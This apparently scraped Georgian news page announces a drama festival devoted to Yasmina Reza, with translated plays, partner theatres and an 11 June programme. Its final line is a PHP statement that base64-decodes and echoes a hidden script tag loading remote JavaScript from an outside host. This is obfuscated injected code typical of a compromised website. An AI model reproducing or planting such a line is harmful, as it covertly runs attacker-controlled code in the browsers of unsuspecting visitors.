celsiusi
ავერსი საქკაბელი
დრამატურგიის ფესტივალი ჯგუფი “ქამელეონის” ორგანიზებით 2022 წელს მეორედ ტარდება. წლის ფესტივალის ავტორი იასმინა რეზა იქნება. 
 
როგორც საინფორმაციო სააგენტო BUSINESS TIME-ს ორგანიზატორებმა აცნობეს, ფესტივალის ფარგლებში ითარგმნა რეზას სამი პიესა: "არტი", "ცხოვრების სამი სახე" და "საუბრები დამარხვის შემდეგ". 
 
ფესტივალის მხარდამჭერია თეატრი "ჰარაკი", რომელიც დგამს პიესას "ცხოვრების სამი სახე" და ზესტაფონის სახელმწიფო დრამატული თეატრი, რომელიც ახალ თეატრალურ სეზონზე დადგამს პიესას - "საუბრები დამარხვის შემდეგ". 
 
ფესტივალის დღეს, 11 ივნისს 16:00 საათზე თეატრში –"ჰარაკი" წარმოდგენილი იქნება თეატრალური წაკითხვა პიესისა "არტი". 
 
ღონისძიების დღის წესრიგი
 
16:00-16:15 ფესტივალის გახსნა;
16:20-17:00  სანდრო კალანდაძე "რატომ ვდგამ იასმინა რეზას" და "ზოგიერთ შემთხვევაში ადაპტაციის საჭიროების შესახებ" ; 
17:10-17:50 პაატა ციკოლია "იასმინა რეზას "ხოცვა-ჟლეტის ღმერთი" - ტექსტი და ადაპტაცია"; 
16:00-17:40 ვალერი ოთხოზორია "იასმინა რეზას დრამატურგია: თანამედროვე ტექსტი და გავლენები";
18:00-19:15 ""არტი"" თეატრალური წაკითხვა (ბექა ხაჩიძე, გიორგი რაზმაძე, თემო რეხვიაშვილი);
19:15-19:25 ფესტივალის დახურვა;
 
557
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");